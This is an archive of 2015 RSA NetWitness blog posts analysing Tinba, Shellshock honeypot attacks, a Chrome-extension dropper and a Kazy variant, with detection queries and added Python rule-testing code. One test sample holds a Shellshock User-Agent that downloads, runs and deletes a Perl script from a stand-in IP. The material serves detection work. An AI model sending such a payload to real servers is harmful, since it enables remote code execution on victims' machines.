RSA NetWitness Platform Blog > 2015 > March

RSA Security Analytics customers,


RSA is pleased to announce the addition of new and updated content to the RSA Live Content Library. New content added to RSA Live during the month of March:

 

  • 2 new Application rules for detecting internal web traffic to remote administration tools
  • 29 updates to Event Stream Analysis (ESA) rules to provide more targeted rule logic
  • 5 Lua parser updates
  • New Log parser support for Entrust Identity Guard
  • 40 Log parser updates that improve parsing accuracy and support newer versions of event sources

 

 

You can find our latest content catalog here:

 

https://sadocs.emc.com/0_en-us/300_RSA_ContentAndResources

 

Additionally, the RSA Content Team will continue its intensive review of the current ESA rule library. The goal of this effort is less noise and more targeted detections from the ESA (correlation) rules.

 

If you have an interesting use case for a piece of content, let us know about it by mailing us at:

 

ASOC.Content@rsa.com

 

Regards,

The ASOC Content Team

 

Tinba is an information-stealing malware family that uses web injects to trick customers of various financial institutions into handing over personal information such as their social security number, address and credit card details. The family, first identified by security researchers at Trend Micro and CSIS, got its name from its small size: a tiny banker Trojan.


We identified a new Tinba variant in RSA FirstWatch Malware Analysis Systems. This is a screenshot from the investigator module in our RSA Security Analytics instance:




As expected, the communication between the infected machine and its C2 domain is encoded and/or encrypted.




Given the network artifacts above, and assuming the corresponding meta keys are enabled, an analyst can create an app rule in RSA Security Analytics to detect this traffic. The rule keys on a request to the C2 directory that carries no filename or extension in its path:

directory = '/el0hjkd76ghs65dhj0it/' && action = 'put' && filename = '<none>' && extension = '<none>'


As of this writing, VirusTotal has a moderate detection rate for the sample under investigation.


Finally, all of the IOCs from those HTTP sessions were added to RSA FirstWatch Live feeds.

Since its public disclosure in September 2014, security researchers have ranked the Shellshock vulnerability among the most severe ever disclosed. Vulnerable versions of Bash evaluated function definitions passed in through environment variables and then executed any commands appended after the function body. An attacker therefore sends a crafted request to an Internet-facing service; if that service hands request data to a vulnerable Bash (for example, a CGI handler that exports request headers as environment variables), the attacker's commands run on the victim machine. This is why system administrators rushed to patch the Unix shell used on so many servers across the Internet.


Web servers in the RSA FirstWatch honeypot started receiving crafted HTTP requests that try to exploit the Shellshock bug. Below is a screenshot from RSA Security Analytics that shows how an attacker embeds the malicious code in the User-Agent header of the HTTP request:




In this case, the injected command downloads a Perl script to the /tmp directory of the victim machine, runs it and then deletes it. The downloaded script is a perlb0t script that has been around for a very long time. The bot communicates with its master through IRC; the IP address of the IRC server and the channel name are hard-coded in the script. One of the functions in the script indicates the following capabilities:

  • Port Scanning
  • HTTP Flooding
  • TCP Flooding
  • UDP Flooding
  • Google searches for servers running unpatched Mambo CMS installations


Below are screenshots of that perl function:




How do you detect this with RSA Security Analytics?

If the client meta key is indexed, you can create an app rule in RSA Security Analytics that flags these requests. The rule uses the following query:

client begins '()'

The client key holds the User-Agent string, and no legitimate User-Agent starts with the "()" that opens a Bash function definition. Note that this rule only covers payloads carried in the User-Agent header; the same payload placed in another header would need a rule on the meta key that holds that header.


Note: All IOCs from this attack were added to RSA FirstWatch Live feeds.

Attackers usually have more time to come up with new ideas and methods to cause harm, so defenders are always looking for solutions that raise the bar an attacker must clear to do damage. In this post we discuss how built-in security enhancements in popular software can be effective against an attacker.

 

The example starts with an unusual User-Agent string found in one of our RSA Security Analytics reports: the sample analyzed used a Google Chrome User-Agent string in its HTTP sessions. Below is a screenshot from RSA Security Analytics that shows HTTP traffic originating from the infected machine:




There are three files of interest in those sessions:

  • lgchknjnpaaohlppjfmhkcpbiibkclfh_.crx
  • external_extensions.json
  • id.php


Looking closely, we can also see the infected machine connecting to a blogspot.com subdomain (the domains provided by Google's Blogger service). In response, the page returned what looks like a code or command to the infected machine:




Running the sample in a more controlled environment showed that the response above is necessary for the binary to continue its malicious behavior. The presence of the string is an indication for the binary that the download server is up so it can download the rest of the files on the infected machine.


Next, the malicious binary reaches out to a domain to download a JSON file, a PHP file and a CRX file:




The string returned in the session above is then used as the filename in the following one:




On an infected machine with Google Chrome installed, the downloaded JSON file replaces the existing external_extensions.json located under

C:\Program Files\Google\Chrome\Application\40.0.2214.93\default_apps\

external_extensions.json holds metadata about the external extensions Chrome should install: the name, version and location of the CRX file for each extension. The CRX file is the packaged extension itself.


The malware downloads the CRX file to the same directory. It copies itself to a temp directory under the name "YoutubeEveryday.exe" and modifies the registry to gain persistence on the system by adding an entry to the autorun (Run) key.


So the malware's main goal is to remove all existing Google Chrome extensions and install the newly downloaded one.

Unfortunately for the malware (and fortunately for the rest of us), this method no longer works. To protect Windows users, Google now only allows external extensions to be installed when they are hosted on the Chrome Web Store, so a CRX dropped into default_apps and registered through external_extensions.json is not loaded. You can read more about the steps that Google took to make its popular Chrome browser more secure. This is an example of raising the bar for the attacker.
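As an added example (not code from this post, from RSA or from Google), the Python below audits a Chrome external_extensions.json the way a responder checking for this tampering would: it validates each extension ID and flags entries that point at a locally sideloaded CRX rather than the Chrome Web Store update URL. The JSON layout follows Chrome's documented external-extension preference format (keys external_crx, external_version and external_update_url); the file contents below are constructed for the example, and the audit logic and the Web Store update URL constant are this example's assumptions.

```python
"""Audit a Chrome external_extensions.json for sideloaded (non-Web-Store)
extensions. Added example; the sample file content below is constructed."""
import json
import re
from typing import Dict, List

# Chrome extension IDs are 32 characters drawn from the letters a-p.
EXT_ID_RE = re.compile(r"^[a-p]{32}$")
# Update URL used by extensions hosted on the Chrome Web Store. Assumption for
# this example: any other source of extension code is treated as suspicious.
WEB_STORE_UPDATE_URL = "https://clients2.google.com/service/update2/crx"

# Constructed sample: one Web Store-hosted entry, one sideloaded CRX named like
# the one described in the post, and one malformed key.
SAMPLE_EXTERNAL_EXTENSIONS = json.dumps({
    "aaaaaaaaaabbbbbbbbbbccccccccccdd": {
        "external_update_url": WEB_STORE_UPDATE_URL,
    },
    "lgchknjnpaaohlppjfmhkcpbiibkclfh": {
        "external_crx": "lgchknjnpaaohlppjfmhkcpbiibkclfh_.crx",
        "external_version": "1.0",
    },
    "not-a-valid-id": {
        "external_crx": "x.crx",
        "external_version": "1.0",
    },
})


def audit_external_extensions(text: str) -> List[Dict[str, str]]:
    """Return one finding per suspicious entry: a malformed ID, a local CRX
    sideload, or an update URL that is not the Chrome Web Store."""
    findings: List[Dict[str, str]] = []
    data = json.loads(text)
    if not isinstance(data, dict):
        return [{"id": "<file>", "reason": "top-level value is not an object"}]
    for ext_id, entry in data.items():
        if not EXT_ID_RE.match(ext_id):
            findings.append({"id": ext_id, "reason": "malformed extension id"})
            continue
        if not isinstance(entry, dict):
            findings.append({"id": ext_id, "reason": "entry is not an object"})
            continue
        if "external_crx" in entry:
            # A CRX path on disk: the sideload technique the post describes.
            findings.append({"id": ext_id,
                             "reason": "local CRX sideload: " + str(entry["external_crx"])})
        elif entry.get("external_update_url") != WEB_STORE_UPDATE_URL:
            findings.append({"id": ext_id,
                             "reason": "non-Web-Store update URL: "
                                       + str(entry.get("external_update_url"))})
    return findings


if __name__ == "__main__":
    for finding in audit_external_extensions(SAMPLE_EXTERNAL_EXTENSIONS):
        print(finding["id"], "-", finding["reason"])
```

To run it against a real installation, read the file from the default_apps directory named above (or the per-user external extensions directory) and pass its contents to audit_external_extensions; any "local CRX sideload" finding deserves a look at the CRX and at the Run key for the dropper.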


As of this writing, VirusTotal has a low detection rate for the sample under investigation.

 

The IOCs discussed in this blog post were added to RSA FirstWatch Live feeds.

Sometimes it is really easy to spot the difference between regular and malicious network traffic. In this post we discuss how to detect a new Kazy variant based on the traffic originating from a couple of infected virtual machines in RSA FirstWatch Malware Analysis Systems.


The screenshot below shows the HTTP traffic between the bots and their C2 domains:




Using RSA Security Analytics to reconstruct one of those sessions, we can see that the User-Agent string is missing from the HTTP headers:




Given the network artifacts above, and assuming the corresponding meta keys are enabled, an analyst can create an app rule in RSA Security Analytics to detect this traffic: a request to the C2 directory with no filename in the path and no User-Agent header at all (client !exists). The following query can be used:

directory = '/spa0wejk2490234jsdf0rta/' && action = 'put' && filename = '<none>' && client !exists
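The three queries in these posts (the Tinba rule, the Shellshock rule client begins '()' and this Kazy rule) share one shape: predicates over HTTP session meta. The Python below is an added example, not code from these posts or from RSA: it extracts the same meta keys from raw HTTP requests, runs all three rules over constructed sample requests, and adds a helper that pulls the injected command out of a Shellshock User-Agent so an analyst can see what the attacker ran. Assumptions: the meta extraction is a simplified model of the product's HTTP parser (POST is mapped to action 'put'; '<none>' and '!exists' in the rules are treated as a missing key), and the host names, the 203.0.113.5 address and the x.pl script name in the samples are made up. Only the two C2 directories are taken from the rules above.

```python
"""Evaluate the three NetWitness-style app rules from these posts against raw
HTTP requests. Added example: the meta extraction is a simplified model of the
product's HTTP parser, and every request below is constructed."""
import re
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional

# Constructed sample requests (not captures from the posts).
SAMPLES: Dict[str, bytes] = {
    "tinba": (b"POST /el0hjkd76ghs65dhj0it/ HTTP/1.1\r\n"
              b"Host: c2.example.invalid\r\n"
              b"User-Agent: Mozilla/4.0 (compatible; MSIE 7.0)\r\n"
              b"Content-Length: 5\r\n\r\nabcde"),
    "shellshock": (b"GET /cgi-bin/status HTTP/1.1\r\n"
                   b"Host: honeypot.example.invalid\r\n"
                   b"User-Agent: () { :;}; /bin/bash -c \"cd /tmp; wget http://203.0.113.5/x.pl; perl x.pl; rm -f x.pl\"\r\n\r\n"),
    "kazy": (b"POST /spa0wejk2490234jsdf0rta/ HTTP/1.1\r\n"
             b"Host: c2.example.invalid\r\n"
             b"Content-Length: 4\r\n\r\ndata"),
    "benign": (b"GET /images/logo.png HTTP/1.1\r\n"
               b"Host: www.example.com\r\n"
               b"User-Agent: Mozilla/5.0\r\n\r\n"),
}


@dataclass
class HttpMeta:
    """Subset of HTTP session meta keys used by the rules; None means the key is absent."""
    action: Optional[str]     # 'get' or 'put' (assumption: a POST is recorded as 'put')
    directory: Optional[str]
    filename: Optional[str]
    extension: Optional[str]
    client: Optional[str]     # User-Agent header


def parse_request(raw: bytes) -> Optional[HttpMeta]:
    """Extract meta from one raw request; returns None for a malformed request line."""
    head, _, _body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    parts = lines[0].split(" ")
    if len(parts) != 3 or not parts[2].startswith("HTTP/"):
        return None
    method, target = parts[0], parts[1]
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")   # split on the first colon only
        if sep:
            headers[name.strip().lower()] = value.strip()
    path = target.split("?", 1)[0]
    directory, _, name = path.rpartition("/")
    extension = name.rsplit(".", 1)[1] if "." in name else None
    action = {"GET": "get", "POST": "put"}.get(method.upper())
    return HttpMeta(action, directory + "/", name or None, extension, headers.get("user-agent"))


# The three app rules as predicates over the meta. '<none>' and '!exists' in
# the original queries correspond to a missing key (None) here.
RULES: Dict[str, Callable[[HttpMeta], bool]] = {
    # directory = '/el0hjkd76ghs65dhj0it/' && action = 'put' && filename = '<none>' && extension = '<none>'
    "tinba_c2": lambda m: (m.directory == "/el0hjkd76ghs65dhj0it/" and m.action == "put"
                           and m.filename is None and m.extension is None),
    # client begins '()'
    "shellshock_ua": lambda m: m.client is not None and m.client.startswith("()"),
    # directory = '/spa0wejk2490234jsdf0rta/' && action = 'put' && filename = '<none>' && client !exists
    "kazy_c2": lambda m: (m.directory == "/spa0wejk2490234jsdf0rta/" and m.action == "put"
                          and m.filename is None and m.client is None),
}

# "() { ...};" followed by the commands Bash would run after the bogus function body.
SHELLSHOCK_PAYLOAD_RE = re.compile(r"^\(\)\s*\{[^}]*\}\s*;\s*(.+)$")


def shellshock_payload(client: str) -> Optional[str]:
    """Return the command that follows the fake function definition, if any."""
    match = SHELLSHOCK_PAYLOAD_RE.match(client)
    return match.group(1) if match else None


def evaluate(raw: bytes) -> List[str]:
    """Names of the rules that fire for one raw request."""
    meta = parse_request(raw)
    if meta is None:
        return []
    return [name for name, rule in RULES.items() if rule(meta)]


if __name__ == "__main__":
    for label, raw in SAMPLES.items():
        print(f"{label:10s} -> {evaluate(raw) or ['no match']}")
    ua = parse_request(SAMPLES["shellshock"]).client
    print("shellshock payload:", shellshock_payload(ua))
```

The benign request matches nothing, each C2 sample matches exactly one rule, and the Shellshock helper returns the download-run-delete command that the honeypot post describes. When the real product is in front of you the rules run on meta the HTTP parser already produced; this script exists to let you check the rule logic against a pcap or a saved request before deploying it.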

 

As of this writing, VirusTotal has a low detection rate of the sample under investigation.


Finally, all of the IOCs from those HTTP sessions were added to RSA FirstWatch Live feeds.
